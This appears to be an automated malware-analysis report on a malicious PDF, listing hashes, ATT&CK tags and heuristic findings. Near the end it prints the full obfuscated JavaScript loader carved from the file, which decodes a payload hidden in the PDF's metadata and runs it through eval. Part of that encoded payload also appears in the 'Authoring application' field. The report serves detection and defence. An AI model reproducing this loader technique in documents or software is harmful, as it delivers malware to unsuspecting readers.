Malicious PDF — malware analysis report

Static analysis result for SHA-256 2a619145c8957765…

MALICIOUS

PDF

32.0 KB Authoring application: G198G147G198G147G198G162G165G150G153G207G144G204G159G150G204G162G204G144G147G198G147G198G159G198G159G168G207G201G201G198G159G147G198G198G153G147G156G195G147G207G198G159G195G198G147G207G156G204G201G147 (via 204G159G162G204G195G168G207G153G207G144G198G159G198G159G198G159G198G153G198G159G147G198G198G153G147G201G204G159G150G204G198G159G147G198G198G153G153G156G144G201G165G207G147G195G147G198G147G198G150G159G) First seen: 2026-05-09
MD5: 9e527c9220138539fe3ca50f6126c4ba SHA-1: a9fe2b57bdc20d3f1763296a3926373b3f5f40c6 SHA-256: 2a619145c8957765c03e01f65580c356b83994511a403249a103087ec60a24ee
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment

The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of a JavaScript object file suggests the script is obfuscated or externalized. The ML_NYX_PDF_MALICIOUS heuristic strongly supports a malicious classification. The document body was not readable, but the presence of JavaScript points to a likely attack pattern involving the execution of a secondary payload. The extracted JavaScript file is the primary IOC.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 6

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var ttty=info["subject"];
function qwaerasdf(asd){return String.fromCharCode(asd);}
function hex2a(hex) {
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
    PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Related samples 1

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0099_000.js pdf-javascript-stream PDF /JS object 99 at offset 0x7C90 1488 bytes
SHA-256: 2fcc44625b9647c86a294ad904f35014a021103976e42d09209624c0dab33176
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function rhjahahagk(){
var asfafa=info;
var ss=asfafa.author;
var hgh=asfafa.keywords;
function dec(input2) {var asfdsad ; var asdf =Fde(input2) ; var asfdsad = hex2a(asdf); return asfdsad;}
function Fde(str){var set='';var s='';var ee='';
str = str.replace(/G/g,",");
str = str.split(",");
for(var i=0;i<str.length;i++){  
ee=str[i]/3;
set+=asdfqwef(ee.toString(16));}
return set;
}
var ded=info.creator;
function asdfewawea(sa){var ses = sa ;return ses;}
function ertenbui45(s){var adsfawheu = "0" ; return adsfawheu+asdfewawea(s);}
function asdfqwef(eds){var set='';var s=eds;
if (s.length<2)
{set=ertenbui45(s);}
else{set=s;}
return set;
}
var ttty=info["subject"];
function qwaerasdf(asd){return String.fromCharCode(asd);}
function hex2a(hex) {
    var str = '';var zzz=qwaerasdf;
    for (var i = 0; i < hex.length; i += 2){
	var sssss = hex.substr(i,2);
       str +=qwaerasdf('asdfwefwuiegfyuadsui0x'.substr(20,2)+sssss);
}    return str;
}
ss+=ttty+hgh; 
var dad=info.producer;
function adsfquifhiwuf(d,dd){return d+dd;}
ss+=adsfquifhiwuf(ded,dad);
var ss=dec(ss);
var dfawlfnewiojfiopwef  = app.alert["adsfwefafdsfwefconstructorasdfwefasdf".substr(15,11)];
function asdfeaf(s){if (s==0){return false}else{return true}}
var susea=asdfeaf(1)+"";
var seasus=asdfeaf(0)+"";
var daeaefe="eafadsfjekafhjkavadfefafaef";
var dudilda=susea[(3+3)/2];
dudilda+=daeaefe[(16+16)/2];
dudilda+=seasus[((1+9)/5)-1];
dudilda+=seasus[(2+10)/6];
dfawlfnewiojfiopwef[dudilda](ss);
}
rhjahahagk();

Open this report in the interactive analyzer, or submit your own file for analysis.